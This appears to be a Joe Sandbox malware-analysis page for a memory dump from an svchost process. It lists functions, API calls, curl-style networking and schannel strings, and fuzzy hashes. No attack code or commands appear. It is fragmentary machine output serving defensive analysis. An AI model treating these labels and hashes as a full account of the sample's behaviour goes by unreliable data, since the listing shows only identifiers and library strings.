                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup$realloc$EnvironmentVariable
                                                                • String ID: %s_proxy$ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$all_proxy$http_proxy$memory shortage$no_proxy
                                                                • API String ID: 2726205129-4066991793
                                                                • Opcode ID: b20cf2b845424565f570792b0e81b042a5e8e627cde1f0f3cdc473821897583c
                                                                • Instruction ID: a8c8cad3041fc6426d18125f054f455d69d5d1e1aac4d365a207e0309e362902
                                                                • Opcode Fuzzy Hash: b20cf2b845424565f570792b0e81b042a5e8e627cde1f0f3cdc473821897583c
                                                                • Instruction Fuzzy Hash: 8DC19E39209B8080FA729BA5D8183E9A7B0B745FDCF8841258E6D1B395FF38C746E350
                                                                Function 00000173D0157410 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 309networkstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: htons$ErrorLast$bindinet_pton$memsetstrchrstrtoul
                                                                • String ID: Bind to local port %d failed, trying next$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s
                                                                • API String ID: 878540305-2129795902
                                                                • Opcode ID: 07d82eafe94d52fbd0b2abec221f66aedff51bda220d6698779ff65217634cad
                                                                • Instruction ID: 7e2680880f674c223dc22de45b43b7db39671d76e4148bbba229b2d3ce70d351
                                                                • Opcode Fuzzy Hash: 07d82eafe94d52fbd0b2abec221f66aedff51bda220d6698779ff65217634cad
                                                                • Instruction Fuzzy Hash: 22D18F7A60C79086FB219BA5E4553EAA7B0F749FC4F800216EE6D4BB95FB78C640D700
                                                                Function 00000173D01A8670 Relevance: 33.7, APIs: 8, Strings: 11, Instructions: 453stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A8737
                                                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00000173D01A8D40
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9124
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A913A
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A914E
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9162
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9176
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A918A
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A919E
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A91B2
                                                                  • Part of subcall function 00000173D01A9E10: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9E27
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E41
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E5C
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E78
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E94
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EB0
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EC8
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EE0
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EF8
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9F10
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9F28
                                                                  • Part of subcall function 00000173D01A9E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9F42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupfree$callocstrtoul
                                                                • String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long hostname (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
                                                                • API String ID: 3044576692-2601942094
                                                                • Opcode ID: 27f0cfac5c0f906d01e34f8b11620997523244c4763ebd0762416814ae1528cb
                                                                • Instruction ID: 3c0c302886c7d79a2553cde684ae161758a990d4414cbd366995b30c3fc41d3e
                                                                • Opcode Fuzzy Hash: 27f0cfac5c0f906d01e34f8b11620997523244c4763ebd0762416814ae1528cb
                                                                • Instruction Fuzzy Hash: F812D03A30868192FB799BA5D5403EAE6B4F785FC4FC84025DB6D57685FB38C652E300
                                                                Function 00000173D01975F0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: $@
                                                                • API String ID: 4045725610-1077428164
                                                                • Opcode ID: 05dd9ea463f012a801519a48da2b6d86e0599e5ab27049c70c2ae09c640e16b4
                                                                • Instruction ID: 1ed942987bd0ca99010bc2f43af5472c930b4a85357f537258385b46e494deb4
                                                                • Opcode Fuzzy Hash: 05dd9ea463f012a801519a48da2b6d86e0599e5ab27049c70c2ae09c640e16b4
                                                                • Instruction Fuzzy Hash: A8316F7A218A4486F7619BA1E4947ABA770FBC9FC4F805111FAAE47A54EF3CC6059B00
                                                                Function 00000173D01816F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Hash$Context$ParamRelease$AcquireCreateDataDestroy
                                                                • String ID: @
                                                                • API String ID: 1945989244-2766056989
                                                                • Opcode ID: 2889442b78905fdd8d053631efe5adc346a36845afa57c8f14538a81b6263cd3
                                                                • Instruction ID: df06b1e9174f2a06cfb0163e79c2f88043031db285efc5f6bb17cb9a9cdd9e41
                                                                • Opcode Fuzzy Hash: 2889442b78905fdd8d053631efe5adc346a36845afa57c8f14538a81b6263cd3
                                                                • Instruction Fuzzy Hash: 9131623A21868486E7609FA1E4947ABB371FBC9FC4F845015FA9E47E54EF3CC6059B00
                                                                Function 00000173D018B4E0 Relevance: 15.4, APIs: 10, Instructions: 364COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f33aeb016327e73d0152d8b92bd744c98b307bf5d66c1aaf36a71338b65c981
                                                                • Instruction ID: 3599aa0cdccf08f6869f93bc1816942a0115f3b392d3e92ba13d933027f6ca18
                                                                • Opcode Fuzzy Hash: 4f33aeb016327e73d0152d8b92bd744c98b307bf5d66c1aaf36a71338b65c981
                                                                • Instruction Fuzzy Hash: 8CE1937A31879092EB748BA6D4D07EAA7B4F785FC4F804015EEAD47A94EB3CC640DB40
                                                                Function 00000173D018C7B0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 485stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _errno$strtol
                                                                • String ID: GMT
                                                                • API String ID: 3596500743-2739267314
                                                                • Opcode ID: 1dd6f7492b7d8111a33b03ad8019fd3ad4e7af892785d0238c0d935642fd42e2
                                                                • Instruction ID: fd14272b497522e09ff5ab4cfe9afbca93b0afb82a8cc2d923e0654fe19a2d67
                                                                • Opcode Fuzzy Hash: 1dd6f7492b7d8111a33b03ad8019fd3ad4e7af892785d0238c0d935642fd42e2
                                                                • Instruction Fuzzy Hash: 7F12E37AA1858456EA348AA9D4C03E9F7A1F345FE4FC44217DABE476C5F73C8B01AB00
                                                                Function 00000173D0197560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                                                • String ID:
                                                                • API String ID: 2110207923-3916222277
                                                                • Opcode ID: a7845bf00f8975745b4070b3587b28da376b11f67f3ab308eeb3fdc92103bbdc
                                                                • Instruction ID: 4cb98b5b8c6b30d8d630c385a23fb62ee37858c914980e848e769cdeb6ff7246
                                                                • Opcode Fuzzy Hash: a7845bf00f8975745b4070b3587b28da376b11f67f3ab308eeb3fdc92103bbdc
                                                                • Instruction Fuzzy Hash: E0018F7A20864486FB20DFA0E4943BBE370FB89FC4F944111EAAD06A68DF7CC544CB00
                                                                Function 00000173D018A4A4 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 318COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                                                                • API String ID: 1294909896-247252918
                                                                • Opcode ID: 9b71fe19b17558c535b4c30176accc14f1f9a49e4d510d29523e8f09ac2727bc
                                                                • Instruction ID: 94239b9964d66b86a107e7c33688e840eca03ab893adf4364b3895557b6da8aa
                                                                • Opcode Fuzzy Hash: 9b71fe19b17558c535b4c30176accc14f1f9a49e4d510d29523e8f09ac2727bc
                                                                • Instruction Fuzzy Hash: 3BD19E7920868092FB749EA5C4943E9A7B0F741FC8FC84521DA6E476D9FB78CB48E350
                                                                Function 00000173D01974E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: @
                                                                • API String ID: 4045725610-2766056989
                                                                • Opcode ID: 3888297001991cb91ed5e33a0340ce1c6b4659861168bb3409d085dce8243c24
                                                                • Instruction ID: f8228d868209ad30440d2add5e8b061b05c7c787cb00f0fd52b906ae3cc296a6
                                                                • Opcode Fuzzy Hash: 3888297001991cb91ed5e33a0340ce1c6b4659861168bb3409d085dce8243c24
                                                                • Instruction Fuzzy Hash: 8BF062BAB1461483F7605B71E8417A7A3B0AB94F85F888010DE6C87A54FF3CC2959B04
                                                                Function 00000173D0181820 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: @
                                                                • API String ID: 4045725610-2766056989
                                                                • Opcode ID: 8f927874fc51e87bfacafe930be793d4c248da460ac4387e593e5e0d7d5bafbf
                                                                • Instruction ID: c0c3007c4852e237e85896ef927b3f62184a317bdeb2718844ad9d28bc2a5e4d
                                                                • Opcode Fuzzy Hash: 8f927874fc51e87bfacafe930be793d4c248da460ac4387e593e5e0d7d5bafbf
                                                                • Instruction Fuzzy Hash: 47F0627AB1461583F7215B71E8417A7A3B1F795B88F844010DE6C47A54EB7CC2959B04
                                                                Function 00000173D01B2470 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 263encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00000173D01B278F
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00000173D01B2777
                                                                • P, xrefs: 00000173D01B266A
                                                                • schannel: Failed to read remote certificate context: %s, xrefs: 00000173D01B2814
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00000173D01B27CE
                                                                • schannel: failed to create certificate chain engine: %s, xrefs: 00000173D01B269A
                                                                • (memory blob), xrefs: 00000173D01B25F2
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00000173D01B27A6
                                                                • schannel: CertGetCertificateChain error mask: 0x%08lx, xrefs: 00000173D01B27DC
                                                                • schannel: CertGetCertificateChain failed: %s, xrefs: 00000173D01B272D
                                                                • schannel: failed to create certificate store: %s, xrefs: 00000173D01B25C6
                                                                • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00000173D01B2545
                                                                • schannel: reusing certificate store from cache, xrefs: 00000173D01B2571
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00000173D01B27BA
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Cert$Certificate$ChainErrorLast$Free$EngineStore$CloseContextCreateOpen_errnomemcmp
                                                                • String ID: (memory blob)$P$schannel: CertGetCertificateChain error mask: 0x%08lx$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: reusing certificate store from cache$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                                                • API String ID: 2715537422-1548139997
                                                                • Opcode ID: d399bcd0cc52d605d7e31dceeb1133debc0e206549a3df09dba65a9132665656
                                                                • Instruction ID: 1300279df47f6ec514f1811e4d1a2b60ea210d163443f2af8bbd63944e3d85ed
                                                                • Opcode Fuzzy Hash: d399bcd0cc52d605d7e31dceeb1133debc0e206549a3df09dba65a9132665656
                                                                • Instruction Fuzzy Hash: DFB16E7921875085EA329BE5E8503EEE3B1B746FC0F804016EE7E47B95EF68C645A740
                                                                Function 00000173D01AF4F0 Relevance: 37.1, APIs: 6, Strings: 15, Instructions: 334COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID: schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: cannot renegotiate, an error is pending$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: recv returned CURLE_RECV_ERROR$schannel: recv returned error %d$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server close notification received (close_notify)$schannel: server closed abruptly (missing close_notify)$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                • API String ID: 2162964266-1798541782
                                                                • Opcode ID: 9e8613e48d921a49cedfa7356a96f8517f371c7eaffba6172c96dda00a0db7ad
                                                                • Instruction ID: 399fc137b6a116c5573936ede1e15b2897f74aa8e851e6c918488589e0d9cc9f
                                                                • Opcode Fuzzy Hash: 9e8613e48d921a49cedfa7356a96f8517f371c7eaffba6172c96dda00a0db7ad
                                                                • Instruction Fuzzy Hash: 7AE17C7A20875086EB70DFE6D4443D9B7B1F741FC8F804019EA6D67698EB78CA86E740
                                                                Function 00000173D0182670 Relevance: 33.5, APIs: 22, Instructions: 470COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D01826DF
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182723
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182547
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182557
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182565
                                                                  • Part of subcall function 00000173D0182510: memset.VCRUNTIME140 ref: 00000173D018259B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182CF6
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D08
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D1F
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D31
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D48
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D5A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup$mallocmemset
                                                                • String ID:
                                                                • API String ID: 1984507481-0
                                                                • Opcode ID: d93b4b9006e4cf8a4b154c9350ebd256b071acccc7fa893b9b6c87d79be3329d
                                                                • Instruction ID: 9bb72c8cdf0df52590556c6c74e23bd678e41632f20d91208ebf80c972334ead
                                                                • Opcode Fuzzy Hash: d93b4b9006e4cf8a4b154c9350ebd256b071acccc7fa893b9b6c87d79be3329d
                                                                • Instruction Fuzzy Hash: 1A22283A609B5092EB768FA5E5803A8B3B5F744FD4F944225CE6D07794EF38CA91E340
                                                                Function 00000173D01A2660 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 169stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchrstrtol
                                                                • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                                                • API String ID: 1626215102-360479797
                                                                • Opcode ID: 571c7b5aa6929f808543d64fd2b5887140b4546232e75ae7bf2446e5d7cfa171
                                                                • Instruction ID: c2f8a24d994ac6f36170f60eb8809005d3f7258a7cd29dff859fe161e888ffad
                                                                • Opcode Fuzzy Hash: 571c7b5aa6929f808543d64fd2b5887140b4546232e75ae7bf2446e5d7cfa171
                                                                • Instruction Fuzzy Hash: 56618EB834865091EA34DB9AE8447E9E7B0B741FD0FC44021ED2E57AA5EB7CC746E304
                                                                Function 00000173D01AB6F0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 249stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
